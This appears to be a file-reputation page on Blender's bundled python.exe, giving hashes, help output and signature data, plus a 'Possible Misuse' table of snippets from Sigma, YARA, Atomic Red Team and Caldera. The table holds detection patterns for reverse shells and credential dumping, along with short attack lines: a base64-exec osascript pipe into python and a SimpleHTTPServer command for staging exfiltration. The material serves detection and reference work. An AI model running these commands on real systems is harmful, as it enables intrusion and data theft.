python.exe

  • File Path: C:\Program Files\Blender Foundation\Blender 2.83\2.83\python\bin\python.exe
  • Description: Python

Hashes

| Type | Hash |
| --- | --- |
| MD5 | 3FE8936968A3EBFFF4AC920E85488F38 |
| SHA1 | A1F5E3D37FB1FA0B393FDB9A5558D2CCD157DF85 |
| SHA256 | FDD16C500862B6943DBC17C5AC85946E1372813EFC6E34EDBED5CE6D0F0A19BB |
| SHA384 | 1669F1EE9077CAA1E16A5AE64EE5EEBED683519514087FA23D686DCA906CB526B4511DF6918F7A1096196D8D87ACDF01 |
| SHA512 | 58603554C678D2DDBB0F2E2D18F2045A1ADFFAE7C07111721EEB4EFA029DD7FFD6920A5B52BEA4A76F7B7045EA255C935ECAD4B0B9552DB8D3A287441D66B428 |
| SSDEEP | 1536:nmkGuKS0IzbuEYE+9z2wp+FavGmhMn+IhzZtz8/iXRPuW4DpKx:m7uO4buAs0FNmhMn+IhN2/iXR77 |

Runtime Data

Usage (stdout):

usage: C:\Program Files\Blender Foundation\Blender 2.83\2.83\python\bin\python.exe [option] ... [-c cmd | -m mod | file | -] [arg] ...
Options and arguments (and corresponding environment variables):
-b     : issue warnings about str(bytes_instance), str(bytearray_instance)
         and comparing bytes/bytearray with str. (-bb: issue errors)
-B     : don't write .pyc files on import; also PYTHONDONTWRITEBYTECODE=x
-c cmd : program passed in as string (terminates option list)
-d     : debug output from parser; also PYTHONDEBUG=x
-E     : ignore PYTHON* environment variables (such as PYTHONPATH)
-h     : print this help message and exit (also --help)
-i     : inspect interactively after running script; forces a prompt even
         if stdin does not appear to be a terminal; also PYTHONINSPECT=x
-I     : isolate Python from the user's environment (implies -E and -s)
-m mod : run library module as a script (terminates option list)
-O     : remove assert and __debug__-dependent statements; add .opt-1 before
         .pyc extension; also PYTHONOPTIMIZE=x
-OO    : do -O changes and also discard docstrings; add .opt-2 before
         .pyc extension
-q     : don't print version and copyright messages on interactive startup
-s     : don't add user site directory to sys.path; also PYTHONNOUSERSITE
-S     : don't imply 'import site' on initialization
-u     : force the stdout and stderr streams to be unbuffered;
         this option has no effect on stdin; also PYTHONUNBUFFERED=x
-v     : verbose (trace import statements); also PYTHONVERBOSE=x
         can be supplied multiple times to increase verbosity
-V     : print the Python version number and exit (also --version)
         when given twice, print more information about the build
-W arg : warning control; arg is action:message:category:module:lineno
         also PYTHONWARNINGS=arg
-x     : skip first line of source, allowing use of non-Unix forms of #!cmd
-X opt : set implementation-specific option
--check-hash-based-pycs always|default|never:
    control how Python invalidates hash-based .pyc files
file   : program read from script file
-      : program read from stdin (default; interactive mode if a tty)
arg ...: arguments passed to program in sys.argv[1:]

Other environment variables:
PYTHONSTARTUP: file executed on interactive startup (no default)
PYTHONPATH   : ';'-separated list of directories prefixed to the
               default module search path.  The result is sys.path.
PYTHONHOME   : alternate <prefix> directory (or <prefix>;<exec_prefix>).
               The default module search path uses <prefix>\python{major}{minor}.
PYTHONCASEOK : ignore case in 'import' statements (Windows).
PYTHONIOENCODING: Encoding[:errors] used for stdin/stdout/stderr.
PYTHONFAULTHANDLER: dump the Python traceback on fatal errors.
PYTHONHASHSEED: if this variable is set to 'random', a random value is used
   to seed the hashes of str, bytes and datetime objects.  It can also be
   set to an integer in the range [0,4294967295] to get hash values with a
   predictable seed.
PYTHONMALLOC: set the Python memory allocators and/or install debug hooks
   on Python memory allocators. Use PYTHONMALLOC=debug to install debug
   hooks.
PYTHONCOERCECLOCALE: if this variable is set to 0, it disables the locale
   coercion behavior. Use PYTHONCOERCECLOCALE=warn to request display of
   locale coercion and locale compatibility warnings on stderr.
PYTHONBREAKPOINT: if this variable is set to 0, it disables the default
   debugger. It can be set to the callable of your debugger of choice.
PYTHONDEVMODE: enable the development mode.

Usage (stderr):

Unknown option: -e
usage: C:\Program Files\Blender Foundation\Blender 2.83\2.83\python\bin\python.exe [option] ... [-c cmd | -m mod | file | -] [arg] ...
Try `python -h' for more information.

Signature

  • Status: Signature verified.
  • Serial: 0FC2CFDD6D5AD878EA6A7AFB6D7A5CD2
  • Thumbprint: 18A976606F95649BB479D1934F21F2AC37D642A8
  • Issuer: CN=SSL.com Code Signing Intermediate CA RSA R1, O=SSL Corp, L=Houston, S=Texas, C=US
  • Subject: CN=Stichting Blender Foundation, O=Stichting Blender Foundation, L=Amsterdam, S=Noord-Holland, C=NL

File Metadata

  • Original Filename: python.exe
  • Product Name: Python
  • Company Name: Python Software Foundation
  • File Version: 3.7.4
  • Product Version: 3.7.4
  • Language: Language Neutral
  • Legal Copyright: Copyright 2001-2016 Python Software Foundation. Copyright 2000 BeOpen.com. Copyright 1995-2001 CNRI. Copyright 1991-1995 SMC.

File Similarity (ssdeep match)

| File | Score |
| --- | --- |
| C:\Program Files (x86)\Python310-32\Lib\venv\scripts\nt\python.exe | 38 |
| C:\Program Files (x86)\Python310-32\python.exe | 72 |
| C:\program files (x86)\Python38-32\python.exe | 71 |
| C:\program files\Blender Foundation\Blender 2.83\2.83\python\bin\python.exe | 96 |
| C:\Program Files\Blender Foundation\Blender 2.90\2.90\python\bin\python.exe | 88 |
| C:\Program Files\Inkscape\bin\python.exe | 74 |
| C:\program files\Inkscape\bin\python.exe | 69 |
| C:\program files\LibreOffice\program\python-core-3.7.7\bin\python.exe | 74 |
| C:\Program Files\Python310\Lib\venv\scripts\nt\python.exe | 40 |
| C:\Program Files\Python310\python.exe | 72 |
| C:\Program Files\Python38\python.exe | 72 |

Possible Misuse

The following table contains possible examples of python.exe being misused. While python.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
| --- | --- | --- | --- |
| sigma | sigma-test.yml | # This workflow will install Python dependencies, run tests and lint with a single version of Python | DRL 1.0 |
| sigma | sigma-test.yml | # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions | DRL 1.0 |
| sigma | sigma-test.yml | - name: Set up Python 3.8 | DRL 1.0 |
| sigma | sigma-test.yml | uses: actions/setup-python@v1 | DRL 1.0 |
| sigma | sigma-test.yml | python-version: 3.8 | DRL 1.0 |
| sigma | sigma-test.yml | python -m pip install --upgrade pip | DRL 1.0 |
| sigma | app_python_sql_exceptions.yml | title: Python SQL Exceptions | DRL 1.0 |
| sigma | app_python_sql_exceptions.yml | description: Generic rule for SQL exceptions in Python according to PEP 249 | DRL 1.0 |
| sigma | app_python_sql_exceptions.yml | - https://www.python.org/dev/peps/pep-0249/#exceptions | DRL 1.0 |
| sigma | app_python_sql_exceptions.yml | product: python | DRL 1.0 |
| sigma | lnx_shell_susp_commands.yml | - 'python -m SimpleHTTPServer' | DRL 1.0 |
| sigma | lnx_shell_susp_commands.yml | - '-m http.server' # Python 3 | DRL 1.0 |
| sigma | proc_creation_macos_screencapture.yml | - https://github.com/BC-SECURITY/Empire/blob/master/lib/modules/python/collection/osx/screenshot.py | DRL 1.0 |
| sigma | web_exchange_exploitation_hafnium.yml | - 'python-requests/2.19.1' | DRL 1.0 |
| sigma | web_exchange_exploitation_hafnium.yml | - 'python-requests/2.25.1' | DRL 1.0 |
| sigma | sysmon_suspicious_remote_thread.yml | - '\python.exe' | DRL 1.0 |
| sigma | image_load_susp_python_image_load.yml | title: Python Py2Exe Image Load | DRL 1.0 |
| sigma | image_load_susp_python_image_load.yml | description: Detects the image load of Python Core indicative of a Python script bundled with Py2Exe. | DRL 1.0 |
| sigma | image_load_susp_python_image_load.yml | Description: 'Python Core' | DRL 1.0 |
| sigma | image_load_susp_python_image_load.yml | - 'Python' # FPs with python38.dll, python.exe etc. | DRL 1.0 |
| sigma | net_connection_win_python.yml | title: Python Initiated Connection | DRL 1.0 |
| sigma | net_connection_win_python.yml | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python | DRL 1.0 |
| sigma | net_connection_win_python.yml | Image\|contains: python | DRL 1.0 |
| sigma | net_connection_win_python.yml | - Legitimate python script | DRL 1.0 |
| sigma | proc_access_win_pypykatz_cred_dump_lsass_access.yml | - 'python3*.dll+' # Pypy requires python>=3.6 | DRL 1.0 |
| sigma | proc_creation_win_pypykatz.yml | - \python.exe | DRL 1.0 |
| sigma | proc_creation_win_susp_adidnsdump.yml | This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, | DRL 1.0 |
| sigma | proc_creation_win_susp_adidnsdump.yml | Image\|endswith: \python.exe | DRL 1.0 |
| sigma | proc_creation_win_webshell_recon_detection.yml | description: Looking for processes spawned by web server components that indicate reconnaissance by popular public domain webshells for whether perl, python or wget are installed. | DRL 1.0 |
| sigma | proc_creation_win_webshell_recon_detection.yml | - 'python --help' | DRL 1.0 |
| sigma | registry_event_asep_reg_keys_modification_currentversion.yml | Details\|contains: '\AppData\Local\Package Cache\{c60fd5ac-367d-4e3a-a975-f157502ac30a}\python' | DRL 1.0 |
| sigma | arcsight.yml | python: | DRL 1.0 |
| sigma | arcsight.yml | product: python | DRL 1.0 |
| sigma | arcsight.yml | deviceProduct: Python | DRL 1.0 |
| sigma | sumologic-cse.yml | application-python: | DRL 1.0 |
| sigma | sumologic-cse.yml | product: python | DRL 1.0 |
| sigma | sumologic.yml | application-python: | DRL 1.0 |
| sigma | sumologic.yml | product: python | DRL 1.0 |
| LOLBAS | Testxlst.yml | Description: Test Jscript included in Python tool to perform XSL transform (for payload execution). | |
| malware-ioc | evilnum | Python/Agent.JM | © ESET 2014-2018 |
| malware-ioc | evilnum | Python/TrojanProxy.Agent.B | © ESET 2014-2018 |
| malware-ioc | evilnum | Python/Spy.KeyLogger.HF | © ESET 2014-2018 |
| malware-ioc | evilnum | Python/RiskWare.LaZagne.D | © ESET 2014-2018 |
| malware-ioc | evilnum | Python/Pyvil.A | © ESET 2014-2018 |
| malware-ioc | misp-machete-event.json | "value": "Python/Machete.A", | © ESET 2014-2018 |
| malware-ioc | misp-machete-event.json | "value": "Python/Machete.B", | © ESET 2014-2018 |
| malware-ioc | misp-machete-event.json | "value": "Python/Machete.C", | © ESET 2014-2018 |
| malware-ioc | misp-machete-event.json | "value": "Python/Machete.D", | © ESET 2014-2018 |
| malware-ioc | misp-machete-event.json | "value": "Python/Machete.E", | © ESET 2014-2018 |
| malware-ioc | misp-machete-event.json | "value": "Python/Machete.F", | © ESET 2014-2018 |
| malware-ioc | misp-machete-event.json | "value": "Python/Machete.G", | © ESET 2014-2018 |
| malware-ioc | misp-machete-event.json | "value": "Python.27.exe", | © ESET 2014-2018 |
malware-ioc vf_ioc_linux_rakos.py # 2) Run: python vol.py -f dump_from_compromise_linux_system.vmem © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor - Xchecked via VT: 57dad9cda501bc8f1d0496ef010146d9a1d3734f", © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor - Xchecked via VT: 385f26d29b46ff55c5f4d6bbfd3da12eb5c33ed7", © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor - Xchecked via VT: 16c206d9cfd4c82d6652afb1eebb589a927b041b", © ESET 2014-2018
malware-ioc misp-telebots.json "comment": "Python\/TeleBot.AA backdoor", © ESET 2014-2018
malware-ioc telebots - Python/TeleBot.AA trojan © ESET 2014-2018
malware-ioc telebots - Python/Agent.Q trojan © ESET 2014-2018
malware-ioc telebots - Python/Agent.AE trojan © ESET 2014-2018
malware-ioc telebots - Python/Agent.AD trojan © ESET 2014-2018
malware-ioc telebots === Python/TeleBot.AA backdoor © ESET 2014-2018
atomic-red-team index.md - Atomic Test #2: Dump individual process memory with Python (Local) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Compressing data using GZip in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Base64 decoding with Python [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Port Scan using python [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1059.006 Python MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Execute shell script via python’s command mode arguement [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Execute Python via scripts (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Execute Python via Python executables (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #2: Dump individual process memory with Python (Local) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #1: Compressing data using GZip in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #3: Base64 decoding with Python [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1059.006 Python MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #1: Execute shell script via python’s command mode arguement [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #2: Execute Python via scripts (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #3: Execute Python via Python executables (Linux) [linux] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #3: Base64 decoding with Python [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - T1059.006 Python CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Port Scan using python [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1059.006 Python CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | Spearphishing via Service CONTRIBUTE A TEST | Python | Create or Modify System Process CONTRIBUTE A TEST | Event Triggered Execution CONTRIBUTE A TEST | Deploy Container CONTRIBUTE A TEST | Man-in-the-Middle CONTRIBUTE A TEST | Local Groups | | Data from Network Shared Drive CONTRIBUTE A TEST | Scheduled Transfer CONTRIBUTE A TEST | External Proxy CONTRIBUTE A TEST | Inhibit System Recovery CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team macos-matrix.md | Spearphishing Link CONTRIBUTE A TEST | Python CONTRIBUTE A TEST | Dylib Hijacking CONTRIBUTE A TEST | Event Triggered Execution CONTRIBUTE A TEST | Domain Accounts CONTRIBUTE A TEST | Keychain | Network Sniffing | | Data from Network Shared Drive CONTRIBUTE A TEST | Exfiltration over USB CONTRIBUTE A TEST | Domain Generation Algorithms CONTRIBUTE A TEST | Endpoint Denial of Service CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | Python | Compromise Client Software Binary CONTRIBUTE A TEST | DLL Side-Loading | Create Snapshot CONTRIBUTE A TEST | Kerberoasting | Process Discovery | | Local Data Staging | | Multi-hop Proxy | Stored Data Manipulation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | Spearphishing Link CONTRIBUTE A TEST | Python CONTRIBUTE A TEST | Browser Extensions | COR_PROFILER | Compile After Delivery | Forced Authentication | Network Sniffing | Shared Webroot CONTRIBUTE A TEST | Data from Removable Media CONTRIBUTE A TEST | Exfiltration to Code Repository CONTRIBUTE A TEST | Encrypted Channel | Firmware Corruption CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Parses secrets hidden in the LSASS process with python. Similar to mimikatz’s sekurlsa:: MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Python 3 must be installed, use the get_prereq_command’s to meet the prerequisites for this test. MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md ##### Description: Computer must have python 3 installed MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md ##### Description: Computer must have python 3 installed MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md - Atomic Test #2 - Dump individual process memory with Python (Local) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md ## Atomic Test #2 - Dump individual process memory with Python (Local) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md Using /proc/$PID/mem, where $PID is the target process ID, use a Python script to MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md PYTHON=$(which python || which python3 || which python2) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md $PYTHON #{python_script} $PID #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md ##### Description: Requires Python MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md (which python || which python3 || which python2) MIT License. © 2018 Red Canary
atomic-red-team T1003.007.md echo “Python 2.7+ or 3.4+ must be installed” MIT License. © 2018 Red Canary
atomic-red-team T1018.md Python 3 and adidnsdump must be installed, use the get_prereq_command’s to meet the prerequisites for this test. MIT License. © 2018 Red Canary
atomic-red-team T1018.md ##### Description: Computer must have python 3 installed MIT License. © 2018 Red Canary
atomic-red-team T1018.md if (python –version) {exit 0} else {exit 1} MIT License. © 2018 Red Canary
atomic-red-team T1018.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1036.006.md 1. echo ‘#!/bin/bash\necho “print "hello, world!"” | /usr/bin/python\nexit’ > execute.txt && chmod +x execute.txt MIT License. © 2018 Red Canary
atomic-red-team T1046.md - Atomic Test #4 - Port Scan using python MIT License. © 2018 Red Canary
atomic-red-team T1046.md ## Atomic Test #4 - Port Scan using python MIT License. © 2018 Red Canary
atomic-red-team T1046.md Scan ports to check for listening ports with python MIT License. © 2018 Red Canary
atomic-red-team T1046.md python #(unknown) -i #{host_ip} MIT License. © 2018 Red Canary
atomic-red-team T1046.md ##### Description: Check if python exists on the machine MIT License. © 2018 Red Canary
atomic-red-team T1046.md if (python –version) {exit 0} else {exit 1} MIT License. © 2018 Red Canary
atomic-red-team T1046.md echo “Python 3 must be installed manually” MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded. MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md 2. Using Python to establish a one-line HTTP server on victim system: MIT License. © 2018 Red Canary
atomic-red-team T1048.003.md python -m SimpleHTTPServer 1337 MIT License. © 2018 Red Canary
atomic-red-team T1059.002.md Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they’re already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.(Citation: Macro Malware Targets Macs)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1059.002.md Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of “t3VhVOs/DyCcDTFzIKanRxkvk3I=”, unless ‘Little Snitch’ is installed, in which case it will just exit. MIT License. © 2018 Red Canary
atomic-red-team T1059.002.md osascript -e “do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(‘ignore’);exec(base64.b64decode(‘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’));\" | python &"” MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md # T1059.006 - Python MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md <blockquote>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md - Atomic Test #1 - Execute shell script via python’s command mode arguement MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md - Atomic Test #2 - Execute Python via scripts (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md - Atomic Test #3 - Execute Python via Python executables (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ## Atomic Test #1 - Execute shell script via python’s command mode arguement MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Download and execute shell script and write to file then execute locally using Python -c (command mode) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md which_python=$(which python || which python3 || which python2) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ##### Description: Verify if python is in the environment variable path and attempt to import requests library. MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md which_python=$(which python || which python3 || which python2); $which_python -V MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ## Atomic Test #2 - Execute Python via scripts (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Create Python file (.py) that downloads and executes shell script via executor arguments MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md | python_script_name | Python script name | Path | T1059.006.py| MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ##### Description: Requires Python MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md ## Atomic Test #3 - Execute Python via Python executables (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md | python_script_name | Name of Python script name | Path | T1059.006.py| MIT License. © 2018 Red Canary
atomic-red-team T1059.006.md | python_binary_name | Name of Python file to be compiled | Path | T1059.006.pyc| MIT License. © 2018 Red Canary
atomic-red-team T1140.md - Atomic Test #3 - Base64 decoding with Python MIT License. © 2018 Red Canary
atomic-red-team T1140.md ## Atomic Test #3 - Base64 decoding with Python MIT License. © 2018 Red Canary
atomic-red-team T1140.md Use Python to decode a base64-encoded text string and echo it to the console MIT License. © 2018 Red Canary
atomic-red-team T1140.md ##### Description: Python must be present MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo “Please install Python 3” MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md <blockquote>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including Python rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data. MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #1 - Compressing data using GZip in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #2 - Compressing data using bz2 in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #3 - Compressing data using zipfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md - Atomic Test #4 - Compressing data using tarfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #1 - Compressing data using GZip in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses GZip from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ##### Description: Requires Python MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md which_python=which python; $which_python -V MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #2 - Compressing data using bz2 in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses bz2 from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #3 - Compressing data using zipfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses zipfile from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md ## Atomic Test #4 - Compressing data using tarfile in Python (Linux) MIT License. © 2018 Red Canary
atomic-red-team T1560.002.md Uses tarfile from Python to compress files MIT License. © 2018 Red Canary
atomic-red-team T1574.006.md On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process’s memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage Dynamic Linker Hijacking to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ. MIT License. © 2018 Red Canary
signature-base airbnb_binaryalert.yar description = "A tool for injecting arbitrary code into running Python processes." CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s3 = "A reverse Python connection payload." fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s4 = "pyrasite - inject code into a running python process" fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s10 = "Write out a reverse python connection payload with a custom port" fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar $s13 = "A reverse Python shell that behaves like Python interactive interpreter." fullword ascii wide CC BY-NC 4.0
signature-base airbnb_binaryalert.yar description = "creddump is a python tool to extract credentials and secrets from Windows registry hives." CC BY-NC 4.0
signature-base apt_backdoor_ssh_python.yar description = "Custome SSH backdoor based on python and paramiko - file server.py" CC BY-NC 4.0
signature-base apt_fvey_shadowbroker_jan17.yar $b1 = "Added Ops library to Python search path" fullword ascii CC BY-NC 4.0
signature-base apt_hafnium_log_sigs.yar $xr4 = /POST \/ecp\/[^\n]{100,600} (ExchangeServicesClient\/0.0.0.0|python-requests\/2.19.1|python-requests\/2.25.1)[^\n]{200,600} (200|301|302) / CC BY-NC 4.0
signature-base apt_nk_inkysquid.yar description = "Python Loader used to execute the BLUELIGHT malware family." CC BY-NC 4.0
signature-base apt_nk_inkysquid.yar $s5 = "python ended" ascii CC BY-NC 4.0
signature-base apt_op_wocao.yar description = "Strings from Python version of Agent" CC BY-NC 4.0
signature-base apt_op_wocao.yar description = "Piece of Base64 encoded data from Agent Python version" CC BY-NC 4.0
signature-base apt_op_wocao.yar description = "Strings from Python keylogger" CC BY-NC 4.0
signature-base apt_op_wocao.yar description = "Python getos utility" CC BY-NC 4.0
signature-base apt_sandworm_exim_expl.yar description = "Detects Sandworm Python loader" CC BY-NC 4.0
signature-base gen_fireeye_redteam_tools.yar description = "Detects FireEye's Python Redflar" CC BY-NC 4.0
signature-base gen_fireeye_redteam_tools.yar description = "Detects FireEye's Python MATRYOSHKA tool" CC BY-NC 4.0
signature-base gen_malware_MacOS_plist_suspicious.yar $p1 = "python" ascii CC BY-NC 4.0
signature-base gen_osx_evilosx.yar //strings present in decoded python script: CC BY-NC 4.0
signature-base gen_osx_pyagent_persistence.yar description = "Detects a Python agent that establishes persistence on macOS" CC BY-NC 4.0
signature-base gen_osx_pyagent_persistence.yar $h1 = "#!/usr/bin/env python" CC BY-NC 4.0
signature-base gen_python_encoded_adware.yar description = "Encoded Python payload for adware" CC BY-NC 4.0
signature-base gen_python_pty_shell.yar reference = "https://github.com/infodox/python-pty-shells/blob/master/tcp_pty_backconnect.py" CC BY-NC 4.0
signature-base gen_python_pyminifier_encoded_payload.yar description = "Detects python code encoded by pyminifier. Used by the Machete malware as researched by ESET" CC BY-NC 4.0
signature-base gen_python_reverse_shell.yara description = "Python Base64 encoded reverse shell" CC BY-NC 4.0
signature-base gen_rats_malwareconfig.yar description = "Detects Python RAT" CC BY-NC 4.0
signature-base gen_redsails.yar description = "Detects Red Sails Hacktool - Python" CC BY-NC 4.0
signature-base gen_susp_wer_files.yar $l3 = "AppPath=C:\\Python" wide nocase CC BY-NC 4.0
signature-base gen_webshells.yar $pbs30 = "bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww" wide ascii CC BY-NC 4.0
signature-base thor-hacktools.yar description = "Detects malicious python shell" CC BY-NC 4.0
signature-base thor-webshells.yar $s0 = "#Use: python wh_bindshell.py [port] [password]" CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword CC BY-NC 4.0
signature-base thor-webshells.yar $s2 = "# d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword CC BY-NC 4.0
signature-base thor-webshells.yar description = "Semi-Auto-generated - file cgi-python.py.txt" CC BY-NC 4.0
stockpile 0ab383be-b819-41bf-91b9-1bd4404d83bf.yml description: A Python agent which communicates via the HTML contact Apache-2.0
stockpile 0ab383be-b819-41bf-91b9-1bd4404d83bf.yml python ragdoll.py -W $server#{app.contact.html} Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml name: Check Python Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml description: Check to see what version of python is installed Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml python3 --version;python2 --version;python --version Apache-2.0
stockpile b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml python3 --version&python2 --version&python --version Apache-2.0

MIT License. Copyright (c) 2020-2021 Strontic.